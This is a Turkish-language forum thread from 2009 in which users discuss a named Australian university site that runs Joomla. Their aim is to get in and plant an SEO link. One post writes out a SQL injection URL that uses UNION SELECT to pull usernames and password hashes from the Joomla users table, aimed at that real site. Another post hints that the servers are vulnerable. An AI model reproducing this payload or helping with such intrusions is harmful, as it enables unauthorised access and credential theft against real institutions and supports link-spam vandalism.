selam arkadaşlar pr10 site
go8.edu.au
pr10 olucak bi site bende aspx,jhtml,hatta kodlama dilini hiç anlayamayacagımız bi şekilde olmasını beklerken sıradan bi joomla karşıma çıktı,daha /administrator kısmı bile şifrelenmemiş...Size sorum burda güncellemeye kadar kalıcak 1 link pr7 olurmu acaba ?
Pr10 edu sıradan bi site...
11
●1.334
- 30-01-2009, 08:47:03Eposta Aktivasyonu Gerekmektehocam öncelikle ifade gücünüz yada Türkçeniz zayıf oldunu üzülerek belirtmek isterim. Sıradan dediğiniz Avusturalyada bir üniversite sitesi. Aspx falan yerine joomla kullanmasına gelince
bu son derece dogal birçok site joomla kullanıyor, Haward wordpress mu kullanıyor mesala
admin kısmınıda şifreleme gerekmiyor.
Link kısmına gelince
site pr10 tek link bence direk 8 yapar
alabiliyorsan harika
- 30-01-2009, 10:02:08Üyeliği durdurulduExploit Denedimde anasayfaya yönleniyor


index.php?option=com_content&task=blogcategory&id= 60&Itemid=99999%20union%20select%201,concat_ws(0x3 a,username,password),3,4,5%20from%20jos_users/*
Group of Eight - 30-01-2009, 10:13:02xFaulz adlı üyeden alıntı: mesajı görüntüle
NE alakası var yaw
Pr10 site cpanel , joomla kullanamaz diye bişey mi var
BEnim Boş sayfalara link verseler onlarda olur pr7-8 ( heralde )
bu son derece dogal birçok site joomla kullanıyor, Haward wordpress mu kullanıyor mesala
alabiliyorsan harika
,Joomlada açık yok,Serverlerin var